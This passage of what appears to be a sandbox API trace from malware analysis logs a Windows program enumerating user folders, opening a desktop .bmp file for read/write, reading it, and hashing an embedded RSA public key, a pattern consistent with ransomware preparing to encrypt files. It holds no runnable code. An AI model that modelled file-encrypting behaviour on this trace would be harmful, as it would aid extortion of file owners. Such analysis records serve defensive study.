(HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.713] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0100.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318138 [0100.714] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0100.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5938 [0100.714] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0100.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0100.714] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0100.714] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0100.714] PathFindFileNameW (pszPath="") returned="" [0100.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0100.714] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0100.714] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.714] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0100.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0100.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2d28 [0100.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c) returned 0x332fc30 [0100.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dc90 [0100.715] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0100.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x38) returned 0x3331bc8 [0100.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0100.715] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0100.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dc90 [0100.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x54) returned 0x3338fa8 [0100.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.715] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0100.715] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0100.716] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0100.716] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0100.716] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0100.716] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.716] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0100.716] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0100.716] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\") returned="KMPcG-yOQU21BwvLjWXX\\" [0100.717] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0100.717] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0100.717] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0100.717] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0100.717] PathFindFileNameW (pszPath="") returned="" [0100.717] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcd03d7d0, ftCreationTime.dwHighDateTime=0x1d5bd42, ftLastAccessTime.dwLowDateTime=0xb36cc4a0, ftLastAccessTime.dwHighDateTime=0x1d5b980, ftLastWriteTime.dwLowDateTime=0xb36cc4a0, ftLastWriteTime.dwHighDateTime=0x1d5b980, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0100.717] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcd03d7d0, ftCreationTime.dwHighDateTime=0x1d5bd42, ftLastAccessTime.dwLowDateTime=0xb36cc4a0, ftLastAccessTime.dwHighDateTime=0x1d5b980, ftLastWriteTime.dwLowDateTime=0xb36cc4a0, ftLastWriteTime.dwHighDateTime=0x1d5b980, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.718] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7148f1c0, ftCreationTime.dwHighDateTime=0x1d5ba7a, ftLastAccessTime.dwLowDateTime=0xd66b500, ftLastAccessTime.dwHighDateTime=0x1d5ba81, ftLastWriteTime.dwLowDateTime=0xd66b500, ftLastWriteTime.dwHighDateTime=0x1d5ba81, nFileSizeHigh=0x0, nFileSizeLow=0x15e76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2TaJ89Ee8.bmp", cAlternateFileName="2TAJ89~1.BMP")) returned 1 [0100.718] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\2TaJ89Ee8.bmp") returned=".bmp" [0100.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\2TaJ89Ee8.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\2taj89ee8.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.718] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=89718) returned 1 [0100.718] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.723] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15e50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.723] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.725] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x15e76, lpOverlapped=0x0) returned 1 [0100.725] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.726] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.726] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.726] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0100.727] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.727] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.727] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.727] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.727] GetLastError () returned 0x0 [0100.727] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.728] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0100.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.728] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.728] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.728] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x15e80) returned 0x9bb8968 [0100.729] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5938 [0100.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7db8 [0100.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5980 [0100.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7dd0 [0100.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e00 [0100.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e18 [0100.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.730] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0100.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e00 | out: hHeap=0x630000) returned 1 [0100.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e18 | out: hHeap=0x630000) returned 1 [0100.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0100.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7e18 [0100.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7e00 [0100.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0100.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0100.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0100.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0100.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e18 | out: hHeap=0x630000) returned 1 [0100.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e00 | out: hHeap=0x630000) returned 1 [0100.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.732] GetCurrentThreadId () returned 0x42c [0100.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba73d8 [0100.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.733] GetCurrentThreadId () returned 0x42c [0100.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0100.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e00 [0100.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0100.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e18 [0100.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 